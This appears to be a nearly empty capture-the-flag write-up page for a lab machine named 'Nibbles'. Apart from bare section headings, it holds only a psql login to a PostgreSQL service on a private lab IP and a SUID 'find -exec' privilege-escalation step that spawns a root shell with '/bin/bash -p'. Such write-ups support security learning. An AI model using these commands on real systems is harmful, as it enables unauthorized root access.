Nibbles
Enumeration & Reconnaissance
Service Analysis

Gaining Initial Access


Privilege Escalation


Lessons Learned
Last updated





Last updated
psql -h 192.168.111.47 -p 5437 -U postgres find test -exec whoami \; # Output: rootfind test -exec /bin/bash -p \;